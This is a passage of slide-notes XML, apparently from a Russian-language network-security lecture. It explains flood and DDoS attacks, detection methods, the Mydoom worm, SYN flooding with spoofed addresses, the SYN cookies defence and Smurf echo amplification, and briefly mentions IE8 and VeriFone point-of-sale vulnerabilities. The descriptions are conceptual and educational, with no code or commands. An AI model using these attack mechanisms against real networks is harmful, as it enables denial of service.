              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>распределенные атаки </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Флуд (англ. flood) — атака, связанная с большим количеством обычно бессмысленных или сформированных в неправильном формате запросов к компьютерной системе или сетевому оборудованию, имеющая своей целью или приведшая к отказу в работе системы из-за исчерпания ресурсов системы — процессора, памяти либо каналов связи. Если атака (обычно флуд) производится одновременно с большого количества IP-адресов, то в этом случае она называется распределённой атакой на отказ в обслуживании (DDoS).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Существует мнение, что специальные средства для обнаружения DoS-атак не требуются, поскольку факт DoS-атаки невозможно не заметить. Во многих случаях это действительно так. Однако достаточно часто отмечались успешные атаки, которые были замечены жертвами лишь через 2-3 суток. Бывало, что негативные последствия атаки (типа флуд) заключались в излишних расходах по оплате трафика, что выяснялось лишь при получении счёта. Кроме того, многие методы обнаружения атак неэффективны вблизи цели атаки, но эффективны на магистральной сети. В таком случае целесообразно ставить системы обнаружения именно там, а не дожидаться, пока пользователь, подвергшийся атаке, сам её заметит и обратится за помощью. К тому же, для эффективного противодействия необходимо знать тип, характер и другие показатели DoS-атаки, а оперативно получить эти сведения как раз и позволяют системы обнаружения.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Методы обнаружения можно разделить на несколько больших групп:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сигнатурные — основанные на качественном анализе трафика;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>статистические — основанные на количественном анализе трафика;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>гибридные — сочетающие в себе достоинства двух предыдущих методов.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пример:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Mydoom (известен также как Novarg) — почтовый червь для Microsoft Windows и Windows NT, эпидемия которого началась 26 января 2004.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Распространялся по электронной почте и через файлообменную сеть Kazaa. Файл-носитель червя имеет размер около 28 килобайт и содержит текстовую строку «sync-1.01; andy; I’m just doing my job, nothing personal, sorry».</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>При заражении компьютера Mydoom модифицирует операционную систему, блокируя доступ к сайтам многих антивирусных компаний, новостным лентам и различным разделам сайта компании Microsoft. В период с 1 по 12 февраля Mydoom.A проводил DDoS‑атаку на сайт Microsoft, а Mydoom.B — на сайт SCO Group.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>За несколько дней до того SCO Group заявила, что подозревает в создании червя сторонников операционной системы GNU/Linux, в которой якобы использовался принадлежавший SCO код, и объявила награду в 250 тысяч долларов за информацию, которая поможет поймать создателей MyDoom.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN flood </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (статья с сайта </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.securitylab.ru/analytics/216320.php</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN атака -это один из типов DDoS атак. Мы можем говорить, что хост жертвы подвергся SYN атаке, в случае, когда злоумышленник пытается создать огромное количество подключений в состоянии SYN RECEIVED до тех пор, пока не переполнится очередь соединений. Состояние SYN RECEIVED создается, когда хост жертвы получает запрос на подключение (пакет с набором флага SYN) и распределяет для этого некоторые ресурсы памяти. При SYN атаке создается такое количество полуоткрытых подключений, что система переполняется и больше не может обрабатывать поступающие запросы.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для увеличения эффективности SYN атаки, злоумышленник использует фиктивные IP адреса в SYN пакетах. В этом случае хост жертвы не может быстро закончить процесс инициализации, потому что исходный IP адрес может быть недостижим. Эта злонамеренная операция называется SYN спуфингом.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Мы должны знать, что процесс создания полного подключения занимает некоторое время. Первоначально, после получения запроса на подключение (пакет с набором флага SYN), хост жертвы помещает это полуоткрытое соединений в очередь и посылает первый ответ (пакет с флагами SYN и ACK). Если жертва не получает ответ от удаленного хоста, то она повторно передает SYN+ACK пакеты, до тех пор, пока не наступит тайм-аут, а затем удаляет это полуоткрытое соединение из очереди. В некоторых операционных системах этот процесс, для каждого отдельного SYN запроса, может занимать приблизительно 3 минуты! Операционная система может обрабатывать только определенное количество полуоткрытых подключений в очереди. Это количество управляется размером очереди соединений. Например, заданный по умолчанию размер очереди в RedHat 7.3 - 256, а в Windows 2000 Professional - 100. Когда размер очереди достигнет этого размера, система больше не будет принимать поступающие запросы.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Защита SYN cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Этот механизм позволяет структурировать пакеты с набором флагов SYN и ACK, которые имеют специально обработанный "начальный номер последовательности" (ISN), называемый cookie. Значение cookie это не псевдослучайное число, сгенерированное системой, а результат действия хеш-функции (в нескольких битах cookie еще сохраняется временная метка). Это значение генерируется хеш-функцией в зависимости от следующей информации: IP-адрес источника, порт источника, IP адрес получателя, порт получателя плюс некоторые секретные значения. В ходе SYN атаки, когда заполняется очередь соединений, система вместо отклонения запроса, генерирует ответ, посылая клиенту пакет с cookie. Когда сервер получает пакет с набором флажка ACK (последняя стадия процесса установления соединения с клиентом), тогда он проверяет значение cookie. Если это значение правильно, то сервер создает подключение, даже в случае если нет никакого соответствующего элемента в очереди соединений. В этом случае мы знаем, что это легальное соединение, и что исходный IP адрес не фиктивный. Важно обратить внимание на то, что механизм работы SYN cookie, вообще не использует очередь соединений, так что теперь мы не должны изменять её размер. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Эхо-атака</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>In such an attack, a perpetrator sends a large amount of ICMP echo request (ping) traffic to IP broadcast addresses, all of which have a spoofed source IP address of the intended victim. If the routing device delivering traffic to those broadcast addresses delivers the IP broadcast to all hosts (for example via a layer 2 broadcast), most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, hundreds of machines might reply to each packet.[1]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>In the late 1990s, many IP networks would participate in Smurf attacks (that is, they would respond to pings to broadcast addresses). Today, thanks largely to the ease with which administrators can make a network immune to this abuse, very few networks remain vulnerable to Smurf attacks.[2]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Статья про взлом </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IE8:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.strf.ru/material.aspx?CatalogId=392&amp;d_no=28568</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2000"/>
            </a:br>
            <a:br>
              <a:rPr sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Другой пример:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>In July 2012, multiple buffer overflow vulnerabilities were found in the firmware used for VeriFone point-of-sale devices.  By exploiting these vulnerabilities, hackers were able to control the terminal and log information input by customers, such as PIN numbers and the magnetic stripe data of a bank card. Lucian Constantin.  ”Artema Hybrid Point-of-sale Devices Can Be Hacked Remotely, Researchers Say”, PCWorld, July 12, 2012 http://www.pcworld.com/businesscenter/article/259152/artema_hybrid_pointofsale_devices_can_be_hacked_remotely_researchers_say.html</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
